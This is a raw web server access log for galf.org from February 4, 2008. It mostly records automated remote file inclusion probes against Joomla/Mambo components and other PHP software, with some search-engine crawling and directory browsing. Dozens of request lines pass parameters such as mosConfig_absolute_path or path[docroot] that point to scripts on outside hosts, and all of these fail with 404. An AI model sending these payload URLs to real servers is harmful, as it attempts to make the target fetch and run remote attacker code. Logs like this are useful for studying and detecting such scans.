85.18.136.89 - - [04/Feb/2008:00:21:00 -0800] "GET /logs/index.php?option=http://www.graveyard.altervista.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "galf.org"
124.217.247.166 - - [04/Feb/2008:00:23:24 -0800] "GET /logs/access_070716.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [04/Feb/2008:00:23:24 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [04/Feb/2008:00:23:25 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.88.3.47 - - [04/Feb/2008:00:23:33 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.88.3.47 - - [04/Feb/2008:00:23:33 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:00:26:00 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.20.22 - - [04/Feb/2008:00:27:17 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.237 - - [04/Feb/2008:00:27:17 -0800] "GET /logs/access_071231.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.27.48 - - [04/Feb/2008:00:30:45 -0800] "GET /logs/access_080107.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
210.205.6.161 - - [04/Feb/2008:00:32:59 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.205.6.161 - - [04/Feb/2008:00:32:59 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.216.90 - - [04/Feb/2008:00:33:53 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.169.187.243 - - [04/Feb/2008:00:36:30 -0800] "GET /logs/access_070716.log//include.php?path[docroot]=htttp://xdengue.iespana.es/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.187.243 - - [04/Feb/2008:00:36:30 -0800] "GET //include.php?path[docroot]=htttp://xdengue.iespana.es/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.187.243 - - [04/Feb/2008:00:36:30 -0800] "GET /logs//include.php?path[docroot]=htttp://xdengue.iespana.es/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
66.51.108.62 - - [04/Feb/2008:00:39:03 -0800] "GET /logs/access_070716.log//include.php?path[docroot]=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.51.108.62 - - [04/Feb/2008:00:39:03 -0800] "GET /logs//include.php?path[docroot]=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.88.3.47 - - [04/Feb/2008:00:40:59 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.122.13.12 - - [04/Feb/2008:00:41:39 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.122.13.12 - - [04/Feb/2008:00:41:39 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.25.236 - - [04/Feb/2008:00:46:05 -0800] "GET /logs/access_070709.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.88.3.47 - - [04/Feb/2008:00:51:05 -0800] "GET /logs/access_070709.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.205.6.161 - - [04/Feb/2008:00:54:05 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.95.144.202 - - [04/Feb/2008:00:55:50 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.95.144.202 - - [04/Feb/2008:00:55:51 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.197.170.165 - - [04/Feb/2008:00:58:07 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.40.234.90 - - [04/Feb/2008:00:59:38 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
222.122.13.12 - - [04/Feb/2008:00:59:38 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.40.234.90 - - [04/Feb/2008:00:59:39 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.6.25.205 - - [04/Feb/2008:01:00:17 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
210.205.6.161 - - [04/Feb/2008:01:07:16 -0800] "GET /logs/access_070709.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:01:09:31 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.235 - - [04/Feb/2008:01:13:06 -0800] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
222.122.13.12 - - [04/Feb/2008:01:14:43 -0800] "GET /logs/access_070709.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://basiclifesaving.org/mycomments/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.216.93 - - [04/Feb/2008:01:17:39 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.131.26 - - [04/Feb/2008:01:26:30 -0800] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
87.106.131.26 - - [04/Feb/2008:01:26:30 -0800] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
83.172.150.28 - - [04/Feb/2008:01:27:18 -0800] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
83.172.150.28 - - [04/Feb/2008:01:27:18 -0800] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
209.97.199.252 - - [04/Feb/2008:01:35:51 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.97.199.252 - - [04/Feb/2008:01:35:52 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.97.199.252 - - [04/Feb/2008:01:35:55 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.97.199.252 - - [04/Feb/2008:01:35:55 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:53 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:54 -0800] "GET /?M=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:54 -0800] "GET /?M=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:54 -0800] "GET /?M=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fupu%2Fohoqoh%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:55 -0800] "GET /?N=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:55 -0800] "GET /?N=http%3A%2F%2Frabotnitsa.ru%2Fjoomla%2Fadministrator%2Fincludes%2Fgosa%2Fyiw%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:55 -0800] "GET /?N=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:55 -0800] "GET /?S=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fupu%2Fohoqoh%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:56 -0800] "GET /?S=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:56 -0800] "GET /?S=http%3A%2F%2Fwww.vacacionalhouse.com%2Fen%2Fimg%2Fvohe%2Fseyon%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:56 -0800] "GET /?D=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:56 -0800] "GET /?D=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:57 -0800] "GET /?D=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fsexes%2Fafacub%2F HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:57 -0800] "GET /logs/ HTTP/1.0" 200 5784 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:57 -0800] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:58 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:58 -0800] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:58 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:58 -0800] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:59 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:39:59 -0800] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:00 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:01 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:01 -0800] "GET /?N=A HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:01 -0800] "GET /?M=D HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:02 -0800] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:02 -0800] "GET /labia/?S=A HTTP/1.0" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:02 -0800] "GET /cendoc/?N=D HTTP/1.0" 200 510 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:02 -0800] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:03 -0800] "GET /?S=D HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:03 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:03 -0800] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:03 -0800] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:04 -0800] "GET /labia/?N=A HTTP/1.0" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:04 -0800] "GET /labia/?S=D HTTP/1.0" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:04 -0800] "GET /cendoc/?N=A HTTP/1.0" 200 510 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:04 -0800] "GET /cendoc/?S=D HTTP/1.0" 200 510 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:05 -0800] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
88.191.22.99 - - [04/Feb/2008:01:40:05 -0800] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
213.186.36.183 - - [04/Feb/2008:01:40:06 -0800] "GET /logs/access_070709.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.186.36.183 - - [04/Feb/2008:01:40:06 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.186.36.183 - - [04/Feb/2008:01:40:06 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.97.199.252 - - [04/Feb/2008:01:46:04 -0800] "GET /logs/access_070716.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.97.199.252 - - [04/Feb/2008:01:46:05 -0800] "GET /logs/access_070716.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.47.202.20 - - [04/Feb/2008:01:48:32 -0800] "GET /logs/oneadmin/adminfoot.php?path[docroot]=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
72.47.202.20 - - [04/Feb/2008:01:48:32 -0800] "GET /oneadmin/adminfoot.php?path[docroot]=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
212.241.168.186 - - [04/Feb/2008:01:51:02 -0800] "GET /logs/index.php?x=http://johnkaragiannis.gr/cms//components/com_plugin/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
212.241.168.186 - - [04/Feb/2008:01:51:05 -0800] "GET /index.php?x=http://johnkaragiannis.gr/cms//components/com_plugin/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
67.195.44.108 - - [04/Feb/2008:01:53:56 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.94 - - [04/Feb/2008:01:53:57 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.47.202.20 - - [04/Feb/2008:01:54:37 -0800] "GET /logs/oneadmin/adminfoot.php?path[docroot]=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "galf.org"
72.47.202.20 - - [04/Feb/2008:01:54:37 -0800] "GET /oneadmin/adminfoot.php?path[docroot]=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
72.30.216.100 - - [04/Feb/2008:01:56:30 -0800] "GET /logs/access_071210.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.118.85.5 - - [04/Feb/2008:01:56:58 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.32.209.240 - - [04/Feb/2008:01:59:01 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.nutrienforma.com/cache/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [04/Feb/2008:01:59:01 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.nutrienforma.com/cache/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:02:26 -0800] "GET /logs/access_070716.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:02:27 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:10:10 -0800] "GET /logs/access_070709.log/modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:10:13 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.212.28.43 - - [04/Feb/2008:02:13:58 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
66.212.28.43 - - [04/Feb/2008:02:13:59 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
217.172.183.206 - - [04/Feb/2008:02:16:51 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://shemale-anal.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
217.172.183.206 - - [04/Feb/2008:02:16:51 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://shemale-anal.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
72.32.209.240 - - [04/Feb/2008:02:17:22 -0800] "GET /logs/access_070709.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.nutrienforma.com/cache/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
